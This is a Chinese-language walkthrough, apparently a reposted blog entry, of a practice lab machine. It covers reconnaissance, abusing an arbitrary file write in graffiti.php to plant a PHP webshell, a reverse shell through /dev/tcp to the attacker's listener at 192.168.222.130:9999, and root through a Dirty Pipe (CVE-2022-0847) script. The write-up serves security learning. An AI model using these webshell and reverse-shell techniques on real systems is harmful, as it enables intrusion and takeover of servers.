靶机渗透-matrix-breakout-2

admin 2024年10月10日21:46:31评论11 views字数 1245阅读4分9秒阅读模式

信息收集   

     在攻击机(kali)上使用nmap 对网段进行扫描来寻找target;

         靶机渗透-matrix-breakout-2


可以得知靶机地址为192.168.222.134,对其端口探测

靶机渗透-matrix-breakout-2

发现其开启了22、80和81端口,对其一一访问

靶机渗透-matrix-breakout-2

上图为80端口

靶机渗透-matrix-breakout-2

上图为81端口

有登录界面,对其进行SQL注入标记。


     继续对靶机进行扫描,使用ffuf进行目录扫描

-c状态码颜色标记 -ic忽略注释

靶机渗透-matrix-breakout-2

靶机渗透-matrix-breakout-2

访问graffiti.php

靶机渗透-matrix-breakout-2

     初步判断有XSS注入点


访问graffiti.txt

靶机渗透-matrix-breakout-2


访问robots.txt

靶机渗透-matrix-breakout-2


信息收集完毕,

可能在http://192.168.222.134:81存在SQL注入;

可能在http://192.168.222.134/graffiti.php存在xss漏洞和命令执行漏洞;

漏洞分析

1.http://192.168.222.134:81

     对其进行sql注入点尝试

靶机渗透-matrix-breakout-2

无任何回显

靶机渗透-matrix-breakout-2


尝试使用时间注入

靶机渗透-matrix-breakout-2

执行语句失败


尝试使用sqlmap扫描

靶机渗透-matrix-breakout-2

搜寻无果,放弃



2.http://192.168.222.134/graffiti.php

进行xss判断

靶机渗透-matrix-breakout-2

靶机渗透-matrix-breakout-2

     成功弹窗(但是xss咋搞服务端呢o(╥﹏╥)o不会搞)

访问graffiti.txt

靶机渗透-matrix-breakout-2

     突然发现所写数据写入了graffiti.txt内,对graffiti.php进行抓包

靶机渗透-matrix-breakout-2

     发现其内有一个file参数指向了graffiti.txt,推测逻辑为将message写入file内,感觉此处存在任意写漏洞,将file参数改为graffiti.php并写入phpinfo

靶机渗透-matrix-breakout-2

可以看到成功执行,再次抓包写一句话木马使用蚁剑进行连接

靶机渗透-matrix-breakout-2

     成功获取webshell,但是并未找到flag,且有文件夹权限不够,推测权限过低,使用远程命令执行来反弹shell



3.Message替换成& /dev/tcp/192.168.222.130/9999 0>&1'"); ?>并编码

然后监听9999端口获得shell

靶机渗透-matrix-breakout-2

查到flag.txt并访问

靶机渗透-matrix-breakout-2

     需要打开网站下的另一个图片文件

靶机渗透-matrix-breakout-2


     使用binwalk分离图片

靶机渗透-matrix-breakout-2

得到8A.zlib(未完待续)



权限提升

     查看是否可以用ssh爆破su账户靶机渗透-matrix-breakout-2     无事发生


     使用uname -a查看版本信息

靶机渗透-matrix-breakout-2

     搜索可得此版本存在漏洞CVE-2022-0847

或者使用linpeas,通过蚁剑上传linpeas.sh并执行

靶机渗透-matrix-breakout-2

可以看到存在许多漏洞

靶机渗透-matrix-breakout-2

通过蚁剑将Dirty-Pipe.sh上传至靶机,并执行

靶机渗透-matrix-breakout-2

获得了root权限

靶机渗透-matrix-breakout-2

取得了root


但是cypher密码还没有拿到,明天再继续解图片隐写

总结

1.学会了新的扫描工具netdiscover,对nmap的使用参数更加熟练;

2.学会了使用文件爆破工具ffuf,对渗透有了新的思路;

3.对shell反弹不够熟悉,需要多加练习;

4.图片隐写这方面知识非常薄弱,需要多加学习

5.学会了使用提权扫描LinPEAS以及已知漏洞的利用方法和方式;

原文始发于微信公众号(X1aoYa0):靶机渗透-matrix-breakout-2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月10日21:46:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机渗透-matrix-breakout-2http://cn-sec.com/archives/1921896.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息